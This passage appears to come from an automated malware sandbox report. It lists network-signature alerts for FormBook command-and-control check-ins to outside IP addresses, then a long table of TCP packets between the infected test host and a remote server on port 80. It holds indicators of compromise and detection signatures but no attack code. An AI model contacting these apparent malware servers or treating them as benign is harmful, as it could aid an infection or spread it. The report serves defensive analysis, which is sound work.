                                                                        2025-02-18T08:16:06.212902+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45266113.248.169.4880TCP
                                                                        2025-02-18T08:16:08.776489+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45266213.248.169.4880TCP
                                                                        2025-02-18T08:16:14.361639+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45266313.248.169.4880TCP
                                                                        2025-02-18T08:16:20.933176+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45266447.83.1.9080TCP
                                                                        2025-02-18T08:16:24.058104+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45266547.83.1.9080TCP
                                                                        2025-02-18T08:16:26.604887+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45266647.83.1.9080TCP
                                                                        2025-02-18T08:16:29.221357+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45266747.83.1.9080TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Feb 18, 2025 08:14:23.378732920 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:23.383565903 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:23.383661985 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:23.383867979 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:23.388693094 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.092175007 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.092207909 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.092230082 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.092236042 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.092237949 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.092247009 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.092282057 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.218756914 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.218781948 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.218811989 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.218830109 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.218832970 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.218847990 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.218857050 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.218868017 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.218930960 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.219089985 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.219130993 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.219146967 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.219183922 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.219434023 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.219484091 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.219486952 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.219505072 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.219523907 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.219540119 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.345206976 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.345220089 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.345232964 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.345313072 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.345324039 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.345366001 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.345371962 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.345391035 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.345422983 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.345449924 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.345455885 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.345710039 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.346187115 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.346194029 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.346205950 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.346282959 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.346293926 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.346412897 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.347067118 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.347433090 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.441428900 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.442543030 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.464917898 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.464945078 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.464951992 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.465002060 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.465002060 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.465015888 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.465023994 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.465069056 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.465291977 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.465337038 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.465343952 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.465373993 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.465409040 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.465468884 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.465475082 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.465548038 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.466049910 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.466057062 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.466063976 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.466115952 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.466140985 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.466146946 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.466162920 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.466185093 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.466315985 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.467005014 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.467011929 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.467024088 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.467068911 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.467107058 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.467238903 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.584546089 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.584558010 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.584573984 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.584585905 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.584745884 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.584748030 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.584752083 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.584764957 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.584805012 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.584831953 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.584839106 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.584851027 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.584877014 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.584969997 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.584976912 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.585025072 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.585706949 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.585715055 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.585727930 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.585766077 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.585844994 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.585851908 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.585865021 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.585896969 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.585899115 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.585903883 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.586050987 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.586685896 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.586692095 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.586708069 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.586824894 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.586831093 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.586858988 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.587107897 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.711575031 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.711585045 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.711703062 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.711715937 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.711728096 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.711734056 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.711761951 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.711767912 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.711772919 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.711772919 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.711795092 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.711807966 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.712069988 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.712075949 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.712086916 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.712117910 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.712156057 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.712258101 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.712264061 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.712270975 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.712306023 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.712356091 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.712510109 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.712517023 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.712523937 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.712559938 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.712685108 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.712691069 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.712853909 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.712872028 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.712877989 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.712889910 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.712924957 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.713047028 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.713052988 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.713184118 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.713219881 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.713227034 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.713238955 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.713248014 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.713275909 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.713300943 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.713815928 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.713820934 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.713835955 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.713869095 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.713989973 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.713995934 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.714008093 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.714015007 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.714070082 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.714070082 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.714111090 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.714196920 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.831108093 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.831120968 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.831134081 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.831139088 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.831146002 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.831152916 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.831204891 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.831211090 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.831331015 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.831398964 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.831542015 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.831547976 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.831559896 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.831603050 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.831712008 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.831717968 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.831729889 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.831734896 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.831741095 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.831748009 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.831760883 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.831768990 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.831897974 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.831904888 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.831923962 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.831962109 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.832412958 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.832575083 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.832581043 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.832592964 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.832602978 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.832628965 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.837946892 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838026047 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.838089943 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838095903 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838105917 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838114023 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838120937 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838152885 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.838268042 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838274002 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838285923 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838294029 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.838325977 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.838457108 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838463068 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838474989 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838483095 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838514090 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.838537931 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.838598967 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838676929 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.838958979 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838965893 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.838977098 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.839020967 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.839117050 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.839123011 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.839133978 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.839139938 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.839145899 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.839164019 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.839306116 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.923405886 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.923547029 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.951220036 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951229095 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951241016 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951246977 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951255083 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951344967 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951358080 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951370001 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951374054 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951380014 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951385975 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951390982 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951400042 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951405048 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951406002 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.951406002 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.951411963 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951420069 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.951432943 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.951453924 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.951498985 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951507092 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951524019 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.951653957 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951659918 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951672077 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951678991 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951680899 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.951703072 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.951730013 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.951819897 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951827049 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.951955080 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.952153921 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.952301979 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.952307940 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.952320099 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.952325106 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.952327967 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.952331066 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.952337027 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.952348948 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.952384949 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.952500105 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.952507019 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.952517033 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.952522993 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.952553034 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.952579021 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.964726925 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.964809895 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.964884043 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.964912891 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.964919090 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965018988 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.965018988 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.965054989 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965060949 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965071917 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965106010 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.965218067 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965224028 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965234995 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965240002 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965246916 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965265036 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.965286970 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.965404987 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965410948 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965423107 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965547085 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.965579987 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965729952 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965735912 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965747118 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965751886 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965754032 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.965759039 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965770960 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965779066 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.965805054 CET4973180192.168.2.4196.251.92.64
                                                                        Feb 18, 2025 08:14:24.965908051 CET8049731196.251.92.64192.168.2.4
                                                                        Feb 18, 2025 08:14:24.965914011 CET8049731196.251.92.64192.168.2.4
